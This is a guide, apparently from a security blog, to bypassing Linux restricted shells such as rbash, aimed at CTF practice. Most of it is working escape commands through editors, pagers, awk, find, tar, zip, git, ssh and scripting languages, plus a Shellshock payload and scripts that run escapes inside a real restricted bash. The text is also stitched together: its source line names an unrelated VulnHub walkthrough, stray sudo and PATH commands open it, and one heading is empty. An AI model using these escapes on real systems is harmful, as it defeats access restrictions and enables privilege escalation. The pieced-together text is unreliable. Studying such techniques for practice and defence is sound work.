Linux Restricted Shell Bypass Guide

The document discusses techniques for bypassing restricted shells, including: 1. Enumerating available commands, operators, programming languages, sudo permissions, and environment variables. 2. Common techniques like running /bin/sh directly or copying binaries, and escaping through programs like ftp, gdb, vim, awk and find. 3. Programming-language techniques using expect, python, php, perl, lua and ruby. 4. Advanced techniques like SSH with a non-default shell, exploiting SUID permissions, and escaping through git, pico, zip and tar. It recommends practicing these techniques on restricted-shell challenges from Root-Me and HackTheBox.


Source: Firefox print of https://www.hackingarticles.in/matrix-1-vulnhub-walkthrough/ (16/03/2023)

$PATH

echo /home/guest/prog/*

echo $SHELL

!/bin/bash



export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH

sudo -l
sudo su

export PATH=/bin:$PATH
sudo su



Linux Restricted Shell Bypass
By @n4ckhcker & @h4d3sw0rm
Contents
[ 1 ] Introduction

[ 2 ] Enumerating the Linux Environment

[ 3 ] Common Exploitation Techniques

[ 4 ] Programming Languages Techniques

[ 5 ] Advanced Techniques

[ 6 ] Time to Practice
Introduction
Hello, so first of all, let's explain what a restricted shell is. A restricted shell is a shell that
blocks or restricts some commands (cd is the classic one; ls, echo and others may simply be
missing from the locked-down PATH) and locks environment variables such as SHELL, PATH and USER
so they cannot be changed. A restricted shell usually also refuses command names containing a
slash (/) and output redirection with > or >>. Common restricted shells are rbash, rksh and rsh
(the restricted Bourne shell, not the remote-shell client of the same name). In rbash specifically
the documented restrictions are: no cd, no setting or unsetting SHELL, PATH, ENV or BASH_ENV, no
command names containing /, no output redirection, no exec, and no set +r to leave restricted
mode. Child processes started from rbash are not restricted, which is what every technique below
relies on. But why would someone want to create a restricted shell? Some examples:
1) To improve security by limiting what an account can run.
2) To block hackers/pentesters who land on that account.
3) Sometimes system administrators create a restricted shell to protect themselves from
dangerous commands.
4) For a CTF challenge (Root-me/hackthebox/vulnhub).
Enumerating the Linux Environment
Enumeration is the most important part. We need to enumerate the Linux environment to see
what we have to work with before we can bypass the rbash.

We need to enumerate:

1) First, check which commands are available (cd, ls, echo, etc.).
2) Check which operators work: >, >>, <, |.
3) Check for available programming languages and interpreters (perl, ruby, python, etc.).
4) Which commands we can run as root (sudo -l).
5) Check for files or commands with the SUID bit set.
6) Check which shell you are in: echo $SHELL and echo $0. Most of the time it will be rbash.
In bash, echo $- shows an r flag when restricted mode is on, which cannot be hidden by a
misleading SHELL value.
7) Check the environment variables: run env or printenv.
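The helpers below are an added example and are not part of the original guide. They run the checklist above using only shell builtins, test(1) and globbing, so they keep working when ls, cat, output redirection and command names containing / are all refused; paste the functions into the restricted session (rbash accepts function definitions) or run the file from a normal shell to compare. The list of candidate commands and the use of /usr as a sample directory are assumptions made for the example.

```shell
#!/bin/sh
# Added example (not from the original guide): enumeration helpers that use only
# shell builtins, test(1) and globbing, so they keep working when ls, cat,
# output redirection and command names with '/' are all refused. Paste the
# functions into the restricted session (rbash accepts function definitions)
# or run this file from a normal shell to compare the two environments.

# Is this shell in restricted mode? bash puts 'r' in $- for rbash / bash -r.
# $SHELL alone proves nothing: an admin can set it to any value.
is_restricted() {
    case "$-" in
        *r*) return 0 ;;
        *)   return 1 ;;
    esac
}

# Which interesting commands resolve through PATH? 'command -v' is a builtin:
# it prints the path of each hit and nothing for a miss, so no redirection
# (which rbash would refuse) is needed to keep the output clean.
# The candidate list is an assumption for this example; extend it as needed.
available_commands() {
    for c in cd ls echo cp cat vi vim rvim nano pico more less man ftp gdb git \
             scp ssh awk find zip tar sudo expect python python3 php perl lua ruby; do
        command -v "$c" || true
    done
}

# Directory listing without ls: the shell expands the glob and hands the names
# to the echo builtin as arguments; the slash rule only applies to command names.
list_dir() {
    echo "$1"/*
}

# Setuid files reachable through PATH, again via globbing rather than find/ls.
# -u is the POSIX test for the setuid bit.
suid_in_path() {
    old_ifs=$IFS
    IFS=:
    for d in $PATH; do
        for f in "$d"/*; do
            if [ -u "$f" ]; then echo "$f"; fi
        done
    done
    IFS=$old_ifs
}

# Does the shell let us redirect output? rbash answers "restricted: cannot
# redirect output" and fails. stderr is deliberately left alone: 2>/dev/null
# is itself an output redirection and would be refused as well.
redirect_allowed() {
    if ( echo probe > /dev/null ); then echo ok; else echo blocked; fi
}

# The checklist from the section above, run in order.
enumerate() {
    echo "SHELL=$SHELL  \$0=$0  flags=$-"
    if is_restricted; then echo "restricted mode: yes"; else echo "restricted mode: no"; fi
    echo "PATH=$PATH"
    echo "output redirection: $(redirect_allowed)"
    echo "--- available commands ---"; available_commands
    echo "--- setuid files on PATH ---"; suid_in_path
    echo "--- sudo rights (non-interactive, -n never prompts) ---"
    case "$(command -v sudo)" in ?*) sudo -n -l ;; *) echo "no sudo" ;; esac
}

enumerate
```

Run from an unrestricted shell the report shows flags without r and output redirection ok; inside rbash the same functions report restricted mode: yes and output redirection: blocked, and the error printed by the redirect probe is the exact message to expect from the real shell.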

Now let’s move into Common Exploitation Techniques.


Common Exploitation Techniques
Now let's see some of the common exploitation techniques. Whatever program spawns the new
shell, that shell inherits the restricted PATH, so once you are out, reset it first
(export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH).

1) If "/" is allowed in command names you can simply run /bin/sh or /bin/bash.
2) If you can run cp, you can copy /bin/sh or /bin/bash into a directory that is on your PATH
and run it by name (rbash refuses ./sh because of the slash). Do not name the copy rbash:
bash re-enters restricted mode whenever its name starts with r.
3) From ftp > !/bin/sh or !/bin/bash
4) From gdb > !/bin/sh or !/bin/bash
5) From more/man/less > !/bin/sh or !/bin/bash
6) From vim > :!/bin/sh or :!/bin/bash
7) From rvim > :python import os; os.system("/bin/bash") (needs a Vim built with Python
support; recent Vim versions also disable the scripting interfaces in restricted mode, so
check :version first)
8) From scp > scp -S /path/yourscript x y: (scp runs the program given with -S in place of
ssh, so your script executes)
9) From awk > awk 'BEGIN {system("/bin/sh")}' or awk 'BEGIN {system("/bin/bash")}'
10) From find > find / -name test -exec /bin/sh \; (the shell is only spawned when a file
named test is found; find . -exec /bin/sh \; -quit works in any directory)
Programming Languages Techniques
Now let's look at some programming-language techniques.

1) From expect > run expect, then spawn sh, then interact
2) From python > python -c 'import os; os.system("/bin/sh")'
3) From php > php -a then system("sh -i"); (exec() captures the output instead of showing it,
so use system())
4) From perl > perl -e 'exec "/bin/sh";'
5) From lua > lua -e 'os.execute("/bin/sh")'
6) From ruby > ruby -e 'exec "/bin/sh"'
Now let's move into Advanced Techniques.
Advanced Techniques
Now let's move into some dirty advanced techniques.
1) From ssh > ssh username@IP -t "/bin/sh" or ssh username@IP -t "/bin/bash"
2) From ssh2 > ssh username@IP -t "bash --noprofile"
Both work when the restriction is applied by a login script (for example an exec rbash in
.profile or .bash_profile) rather than by the account's login shell: a command passed to ssh
runs non-interactively, so those files are skipped. If the login shell itself is rbash,
rbash -c "/bin/sh" is refused because of the slash.
3) From ssh3 > ssh username@IP -t "() { :; }; /bin/bash" (Shellshock, CVE-2014-6271; only
works against an unpatched bash behind a ForceCommand, which exports the client's command
as SSH_ORIGINAL_COMMAND)
4) From ssh4 > ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID) (ProxyCommand
runs the given program locally, so a user who may run ssh but not /tmp/yourfile.sh directly
gets it executed anyway)
5) From git > git help status opens the pager, then !/bin/bash
6) From pico > pico -s "/bin/bash", then write /bin/bash in the buffer and press CTRL + T
(the spell checker runs the -s program on the saved buffer, so bash executes it as a script
and starts an interactive bash)
7) From zip > zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash" (/tmp/test
must exist; -T tests the archive with the given unzip command)
8) From tar > tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
(GNU tar only; testfile must exist)
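The harness below is an added example and is not part of the original guide. It starts a genuine restricted bash (bash -r behaves exactly like rbash), confirms which of the restrictions from the Introduction actually fire, then runs the awk escape from Common Exploitation Techniques, the python escape from Programming Languages Techniques and the tar checkpoint escape from Advanced Techniques inside it. Each escape makes the spawned /bin/sh print a marker string (awk-escaped, py-escaped, tar-escaped, all constructed for this example) instead of opening an interactive shell, so the result can be checked from a script. Assumptions: bash and awk are installed; python3 and GNU tar are optional and reported as skipped when absent; /tmp and /dev/null exist.

```shell
#!/bin/sh
# Added example (not from the original guide). Runs a real restricted bash and
# checks which restrictions fire, then performs three escapes inside it.
# Assumptions: bash and awk exist; python3 and GNU tar are optional.
# Marker strings (awk-escaped, py-escaped, tar-escaped) are constructed here.

# Run one command line in a fresh restricted bash (bash -r is rbash).
# Returns the command's exit status; output is discarded.
in_rbash() {
    bash -r -c "$1" >/dev/null 2>&1
}

# Print "blocked" if rbash refuses the command line, "allowed" otherwise.
probe() {
    if in_rbash "$1"; then echo allowed; else echo blocked; fi
}

# Feed a script to a restricted bash on stdin and return its stdout, so the
# caller can see what the (unrestricted) child shell printed.
rbash_script() {
    bash -r -s 2>/dev/null
}

# Which of the documented rbash restrictions actually fire on this system.
restriction_report() {
    for line in 'cd /tmp' '/bin/true' 'PATH=/tmp' 'echo x > /dev/null' 'true'; do
        printf '%-20s %s\n' "$line" "$(probe "$line")"
    done
}

# Common technique: awk has no slash in its name, and its system() hands the
# string to /bin/sh, which is a fresh, unrestricted process.
awk_escape() {
    command -v awk >/dev/null 2>&1 || { echo skipped; return 0; }
    rbash_script <<'EOF'
awk 'BEGIN { system("/bin/sh -c \"echo awk-escaped\"") }'
EOF
}

# Programming-language technique: the same idea through python's os.system().
python_escape() {
    command -v python3 >/dev/null 2>&1 || { echo skipped; return 0; }
    rbash_script <<'EOF'
python3 -c 'import os; os.system("/bin/sh -c \"echo py-escaped\"")'
EOF
}

# Advanced technique: GNU tar's --checkpoint-action=exec runs its argument via
# /bin/sh at every checkpoint, and --checkpoint=1 makes the first record trigger
# it. /dev/null serves as both archive and member so nothing is written. The
# action can fire more than once, so only the first line is kept.
tar_escape() {
    tar --version 2>/dev/null | grep -q 'GNU tar' || { echo skipped; return 0; }
    rbash_script <<'EOF' | head -n 1
tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="echo tar-escaped"
EOF
}

demo() {
    echo "== restrictions (expected: blocked for the first four, allowed for true) =="
    restriction_report
    echo "== escapes (expected: the marker string, or skipped) =="
    echo "awk:    $(awk_escape)"
    echo "python: $(python_escape)"
    echo "tar:    $(tar_escape)"
}

if command -v bash >/dev/null 2>&1; then
    demo
else
    echo "bash not installed; nothing to demonstrate"
fi
```

To turn any of the escapes back into an interactive shell, replace the /bin/sh -c "echo ..." payload with a bare /bin/sh and run it from a terminal rather than through rbash_script; the point of the markers is only to make the success of the escape checkable.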

C SETUID SHELL :
Time to Practice
Root-me has an INSANE rbash bypass challenge!

https://www.root-me.org/en/Challenges/App-Script/Restricted-shells

Hackthebox solidstate machine! (Easy)

https://www.hackthebox.eu/
